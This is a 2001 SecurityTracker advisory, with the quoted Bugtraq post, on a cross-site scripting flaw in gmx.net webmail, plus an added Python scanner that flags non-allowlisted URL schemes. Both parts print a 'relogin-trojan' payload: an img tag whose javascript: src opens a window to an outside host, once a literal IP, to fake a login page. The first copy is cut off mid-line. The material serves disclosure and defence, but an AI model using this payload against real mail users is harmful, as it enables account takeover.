SecurityTracker.com
Category:  Application (E-mail Server)  >  Gmx.net
Vendors:  GMX
Gmx.net Web-Based E-mail System Lets Remote Users Execute Arbitrary Code on the User's Browser
Date:  Jun 12 2001 17:34 (UTC/GMT)
Impact:  Execution of arbitrary code via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Description:  A vulnerability has been reported in the gmx.net web-based e-mail system that lets remote users execute arbitrary code on the user's browser.

The system reportedly fails to properly filter JavaScript in HTML-based e-mail messages.

A remote user can place JavaScript within the <img> tag, as a javascript: URL in its src attribute.

An example demonstration trojan is provided:

<html><body> <img src="javascript:
gmx=window.open('http://[host]/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resi
.focus();">
<h4 >mungo baby</h4></body></html>

Impact:  A remote user can send HTML-based e-mail to a user such that the user's browser will execute trojan Javascript code when the e-mail is viewed (this requires Javascript to be enabled on the user's browser).
Solution:  The vendor is preparing a fix, to be released shortly.
Vendor URL:  www.gmx.net/
Cause:  Input validation error
Reported By:  "rudi carell" <rudicarell@hotmail.com>
Message History:   None.
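
The filtering failure described above comes down to a URL-bearing attribute reaching the browser without a check on its scheme. The following Python code is an added example, not GMX's fix and not part of the original advisory or message: it checks an HTML mail part against a scheme allowlist. The attribute set, the allowed schemes and all function names are assumptions chosen for illustration, and the sample input is constructed from the advisory's demonstration message.

```python
from html.parser import HTMLParser

# Assumed policy for this example: attributes that carry a URL, and the only
# schemes an HTML mail part may reference. Anything else is reported.
URL_ATTRS = {"src", "href", "background", "action"}
ALLOWED_SCHEMES = {"http", "https", "cid", "mailto"}
STRIP_LEADING = "".join(chr(c) for c in range(0x21))  # C0 controls and space


def url_scheme(value):
    """Return the lower-cased scheme a browser would see, or None if relative."""
    # Browsers drop tabs and newlines inside a URL and ignore leading
    # whitespace, so normalise the same way before reading the scheme.
    cleaned = "".join(ch for ch in value if ch not in "\t\r\n").lstrip(STRIP_LEADING)
    head, sep, _ = cleaned.partition(":")
    if sep and head[:1].isalpha() and all(c.isalnum() or c in "+-." for c in head):
        return head.lower()
    return None


class MailHtmlScanner(HTMLParser):
    """Records (tag, attribute, scheme) for each URL attribute outside the policy."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases names and decodes character references in values.
        for name, value in attrs:
            if name in URL_ATTRS and value:
                scheme = url_scheme(value)
                if scheme is not None and scheme not in ALLOWED_SCHEMES:
                    self.findings.append((tag, name, scheme))


def scan_html_part(html):
    """Parse one HTML mail part and return the list of policy violations."""
    scanner = MailHtmlScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample, shortened from the advisory's demonstration message.
SAMPLE = """<html><body> <img src="javascript:
gmx=window.open('http://[host]/gmx/index.html','gmx');gmx.focus();">
<h4>mungo baby</h4></body></html>"""
```

A mail part with any finding should be rejected or have the offending attribute removed before it is rendered in the webmail session.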


 Source Message Contents

Date:  Mon, 11 Jun 2001 09:31:04
From:  "rudi carell" <rudicarell@hotmail.com>
Subject:  gmx.net

 


good morning bugtraq,

gmx.net is a european-based free web-mail-, web-community system comparable 
with hotmail.com.

like many other web-mail systems gmx.net has a problem filtering java-script 
in html-based mail-messages.

this enables an attacker to create html-messages with malicious java-script 
embedded.

problem description:

the html - <img> tag can be used to embed malicious
java-scripts within html-mails

once the "html-mailpart" is opened by the gmx-user it is possible
the "embedded" java-script is executed by the web-browser (if enabled :-) this 
makes it possible to place trojans and execute URL-based webmail-commands 
leading to a compromise of the users webmail-account.

sample with "classic" relogin-trojan:

---cut here---

<html><body> <img src="javascript:
gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();">
<h4>mungo baby</h4></body></html>

---cut here---

.. not very sophisticated but working... changing user-options would be more elaborate ..

nice day,

rc

rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com

vendor status: mail has been sent to security@gmx.net

RC-EOF



Copyright 2001, SecurityGlobal.net LLC